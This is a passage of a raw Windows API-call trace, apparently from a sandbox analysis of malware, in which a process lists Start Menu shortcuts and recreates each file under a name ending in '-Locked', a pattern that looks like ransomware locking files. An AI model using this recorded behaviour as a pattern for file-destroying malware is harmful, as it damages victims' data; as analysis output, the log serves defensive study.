hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bdb45f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98bdb45f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98bdc5e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x991, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher 2016.lnk", cAlternateFileName="PUBLIS~1.LNK")) returned 1 [0299.620] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x2007da5a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2007da5a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2007da5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.lnk", cAlternateFileName="")) returned 1 [0299.622] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d3e739, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98d3e739, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98d3faa2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business 2016.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0299.622] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartUp", cAlternateFileName="")) returned 1 [0299.622] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.622] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.623] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5a53, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0299.623] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.623] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0299.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af160) returned 1 [0299.632] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked", lpFilePart=0x0) returned 0x4b [0299.633] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked-Locked", lpFilePart=0x0) returned 0x52 [0299.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.633] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\access 2016.lnk-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.633] GetFileType (hFile=0x49c) returned 0x1 [0299.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.634] GetFileType (hFile=0x49c) returned 0x1 [0299.635] CloseHandle (hObject=0x49c) returned 1 [0299.636] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked", lpFilePart=0x0) returned 0x47 [0299.636] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x4e [0299.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.636] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.636] GetFileType (hFile=0x49c) returned 0x1 [0299.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.637] GetFileType (hFile=0x49c) returned 0x1 [0299.639] CloseHandle (hObject=0x49c) returned 1 [0299.639] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk", lpFilePart=0x0) returned 0x40 [0299.639] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", lpFilePart=0x0) returned 0x47 [0299.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.639] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.640] GetFileType (hFile=0x49c) returned 0x1 [0299.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.640] GetFileType (hFile=0x49c) returned 0x1 [0299.642] CloseHandle (hObject=0x49c) returned 1 [0299.642] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", lpFilePart=0x0) returned 0x47 [0299.643] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked-Locked", lpFilePart=0x0) returned 0x4e [0299.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.643] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.lnk-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.643] GetFileType (hFile=0x49c) returned 0x1 [0299.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.643] GetFileType (hFile=0x49c) returned 0x1 [0299.645] CloseHandle (hObject=0x49c) returned 1 [0299.646] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Devices Flow.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Devices Flow.lnk", lpFilePart=0x0) returned 0x45 [0299.646] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Devices Flow.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Devices Flow.lnk-Locked", lpFilePart=0x0) returned 0x4c [0299.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.646] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Devices Flow.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\devices flow.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.646] GetFileType (hFile=0x49c) returned 0x1 [0299.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.646] GetFileType (hFile=0x49c) returned 0x1 [0299.650] CloseHandle (hObject=0x49c) returned 1 [0299.651] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Excel 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Excel 2016.lnk", lpFilePart=0x0) returned 0x43 [0299.651] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Excel 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Excel 2016.lnk-Locked", lpFilePart=0x0) returned 0x4a [0299.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.651] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Excel 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\excel 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.653] GetFileType (hFile=0x49c) returned 0x1 [0299.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.653] GetFileType (hFile=0x49c) returned 0x1 [0299.654] CloseHandle (hObject=0x49c) returned 1 [0299.655] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Immersive Control Panel.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Immersive Control Panel.lnk", lpFilePart=0x0) returned 0x50 [0299.655] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Immersive Control Panel.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Immersive Control Panel.lnk-Locked", lpFilePart=0x0) returned 0x57 [0299.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.655] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Immersive Control Panel.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\immersive control panel.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.659] GetFileType (hFile=0x49c) returned 0x1 [0299.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.659] GetFileType (hFile=0x49c) returned 0x1 [0299.661] CloseHandle (hObject=0x49c) returned 1 [0299.662] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\MiracastView.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\MiracastView.lnk", lpFilePart=0x0) returned 0x45 [0299.662] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\MiracastView.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\MiracastView.lnk-Locked", lpFilePart=0x0) returned 0x4c [0299.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.662] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\MiracastView.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\miracastview.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.731] GetFileType (hFile=0x49c) returned 0x1 [0299.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.731] GetFileType (hFile=0x49c) returned 0x1 [0299.734] CloseHandle (hObject=0x49c) returned 1 [0299.734] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneDrive for Business.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneDrive for Business.lnk", lpFilePart=0x0) returned 0x4e [0299.734] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneDrive for Business.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneDrive for Business.lnk-Locked", lpFilePart=0x0) returned 0x55 [0299.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.735] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneDrive for Business.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\onedrive for business.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.736] GetFileType (hFile=0x49c) returned 0x1 [0299.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.736] GetFileType (hFile=0x49c) returned 0x1 [0299.738] CloseHandle (hObject=0x49c) returned 1 [0299.738] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneNote 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneNote 2016.lnk", lpFilePart=0x0) returned 0x45 [0299.738] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneNote 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneNote 2016.lnk-Locked", lpFilePart=0x0) returned 0x4c [0299.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.739] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\OneNote 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\onenote 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.739] GetFileType (hFile=0x49c) returned 0x1 [0299.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.739] GetFileType (hFile=0x49c) returned 0x1 [0299.742] CloseHandle (hObject=0x49c) returned 1 [0299.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Outlook 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Outlook 2016.lnk", lpFilePart=0x0) returned 0x45 [0299.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Outlook 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Outlook 2016.lnk-Locked", lpFilePart=0x0) returned 0x4c [0299.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.743] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Outlook 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\outlook 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.743] GetFileType (hFile=0x49c) returned 0x1 [0299.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.743] GetFileType (hFile=0x49c) returned 0x1 [0299.745] CloseHandle (hObject=0x49c) returned 1 [0299.746] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PowerPoint 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PowerPoint 2016.lnk", lpFilePart=0x0) returned 0x48 [0299.746] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PowerPoint 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PowerPoint 2016.lnk-Locked", lpFilePart=0x0) returned 0x4f [0299.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.746] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PowerPoint 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\powerpoint 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.747] GetFileType (hFile=0x49c) returned 0x1 [0299.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.747] GetFileType (hFile=0x49c) returned 0x1 [0299.748] CloseHandle (hObject=0x49c) returned 1 [0299.749] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PrintDialog.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PrintDialog.lnk", lpFilePart=0x0) returned 0x44 [0299.749] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PrintDialog.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PrintDialog.lnk-Locked", lpFilePart=0x0) returned 0x4b [0299.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.749] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\PrintDialog.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\printdialog.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.749] GetFileType (hFile=0x49c) returned 0x1 [0299.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.749] GetFileType (hFile=0x49c) returned 0x1 [0299.751] CloseHandle (hObject=0x49c) returned 1 [0299.751] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Publisher 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Publisher 2016.lnk", lpFilePart=0x0) returned 0x47 [0299.751] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Publisher 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Publisher 2016.lnk-Locked", lpFilePart=0x0) returned 0x4e [0299.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.751] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Publisher 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\publisher 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.757] GetFileType (hFile=0x49c) returned 0x1 [0299.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.758] GetFileType (hFile=0x49c) returned 0x1 [0299.760] CloseHandle (hObject=0x49c) returned 1 [0299.760] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Search.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Search.lnk", lpFilePart=0x0) returned 0x3f [0299.761] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Search.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Search.lnk-Locked", lpFilePart=0x0) returned 0x46 [0299.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.761] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Search.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\search.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.761] GetFileType (hFile=0x49c) returned 0x1 [0299.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.762] GetFileType (hFile=0x49c) returned 0x1 [0299.845] CloseHandle (hObject=0x49c) returned 1 [0299.845] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Skype for Business 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Skype for Business 2016.lnk", lpFilePart=0x0) returned 0x50 [0299.846] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Skype for Business 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Skype for Business 2016.lnk-Locked", lpFilePart=0x0) returned 0x57 [0299.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.846] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Skype for Business 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\skype for business 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.849] GetFileType (hFile=0x49c) returned 0x1 [0299.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.849] GetFileType (hFile=0x49c) returned 0x1 [0299.851] CloseHandle (hObject=0x49c) returned 1 [0299.851] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Word 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Word 2016.lnk", lpFilePart=0x0) returned 0x42 [0299.852] GetFullPathNameW (in: 